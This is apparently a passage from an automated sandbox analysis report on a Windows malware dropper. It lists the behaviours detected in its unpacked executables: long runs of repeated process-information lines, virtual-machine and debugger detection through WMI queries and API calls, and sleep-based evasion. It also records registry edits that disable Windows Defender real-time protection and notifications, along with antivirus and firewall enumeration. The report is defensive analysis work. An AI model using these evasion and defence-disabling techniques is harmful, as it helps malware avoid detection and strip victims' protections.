                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe TID: 4488Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe TID: 2228Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe TID: 5136Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe TID: 6124Thread sleep count: 2031 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe TID: 5552Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,13_2_004019F0
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeWindow / User API: threadDelayed 2031Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-2575
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-2575
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2575
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2821
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeAPI call chain: ExitProcess graph end node
                      Source: dvL76s65.exe, 0000000F.00000002.419531812.0000000007F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ;Y
                      Source: dvL76s65.exe, 0000000F.00000003.410086799.0000000007F78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                      Source: dvL76s65.exe, 0000000F.00000003.410086799.0000000007F78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareE7R15_4AWin32_VideoController8D1N5GGZVideoController120060621000000.000000-00045768007display.infMSBDAEGWTPFDPPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&
                      Source: dvL76s65.exe, 0000000F.00000002.412316821.0000000002E7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareE7R15_4AWin32_VideoController8D1N5GGZVideoController120060621000000.000000-00045768007display.infMSBD
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_00405467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00405467
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_00402390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00402390
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeCode function: 1_2_010B2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_010B2390
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeCode function: 2_2_00962390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00962390
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeCode function: 3_2_00192390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_00192390
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,13_2_004019F0
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_00402F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00402F1D
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_069020A3 push dword ptr fs:[00000030h]0_2_069020A3
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02BF092B mov eax, dword ptr fs:[00000030h]13_2_02BF092B
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02BF0D90 mov eax, dword ptr fs:[00000030h]13_2_02BF0D90
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0040CE09
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_0040ADB0 GetProcessHeap,HeapFree,13_2_0040ADB0
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_00406F40 SetUnhandledExceptionFilter,0_2_00406F40
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_00406CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00406CF0
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeCode function: 1_2_010B6F40 SetUnhandledExceptionFilter,1_2_010B6F40
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exeCode function: 1_2_010B6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_010B6CF0
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeCode function: 2_2_00966F40 SetUnhandledExceptionFilter,2_2_00966F40
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exeCode function: 2_2_00966CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00966CF0
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeCode function: 3_2_00196F40 SetUnhandledExceptionFilter,3_2_00196F40
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exeCode function: 3_2_00196CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00196CF0
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0040CE09
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0040E61C
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00416F6A
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_004123F1 SetUnhandledExceptionFilter,13_2_004123F1
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02BFE883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_02BFE883
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02BFD070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_02BFD070
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02C071D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_02C071D1
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: 13_2_02C02658 SetUnhandledExceptionFilter,13_2_02C02658
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_004017EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_004017EE
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: GetLocaleInfoA,13_2_00417A20
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeCode function: GetLocaleInfoA,13_2_02C07C87
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_00407155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00407155
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeCode function: 4_2_00007FFBACED077D GetUserNameA,4_2_00007FFBACED077D
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exeCode function: 0_2_00402BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00402BFB

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Disable Windows Defender real time protection (registry)
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                      Disable Windows Defender notifications (registry)
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
